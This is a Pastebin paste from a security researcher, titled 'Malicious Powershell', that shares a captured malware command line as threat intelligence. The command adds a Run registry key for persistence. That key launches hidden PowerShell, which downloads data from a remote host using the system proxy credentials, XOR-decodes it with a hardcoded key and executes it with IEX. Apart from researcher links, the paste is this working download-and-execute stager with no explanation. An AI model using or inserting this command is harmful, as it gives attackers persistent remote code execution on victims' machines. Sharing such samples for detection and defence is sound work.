API tools faq
paste
Neonprimetime

Malicious Powershell

Neonprimetime
Aug 31st, 2016
168
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 0.86 KB | None | 0 0
raw download clone embed print report
  1. Malicious Powershell
  2. *******
  3. CommandLine = reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v Task /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden -Enc $WC=NeW-OBjEct SyStEM.Net.WeBCLIEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeaDErs.AdD('User-Agent',$u);$wc.PRoXY = [SYSTEM.Net.WebREQUEST]::DEFaUlTWEbProXY;$Wc.PrOXy.CREdENtialS = [SYsTEm.NET.CREdENtIALCacHe]::DEfAuLTNetWoRkCREdenTiaLs;$K='j}?1`(^lr.kOCQBc4Xo@P!zK5T)&bdyn';$i=0;[chaR[]]$b=([ChAr[]]($wc.DoWnlOADStRinG("http://X.X.X.X/file.asp")))|%{$_-BXOr$k[$I++%$k.LEnGTH]};IEX ($B-joiN'')"
  4. *******
  5. More FROM @neonprimetime security
  6.  
  7. http://pastebin.com/u/Neonprimetime
  8. https://www.virustotal.com/en/USER/neonprimetime/
  9. https://twitter.com/neonprimetime
  10. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!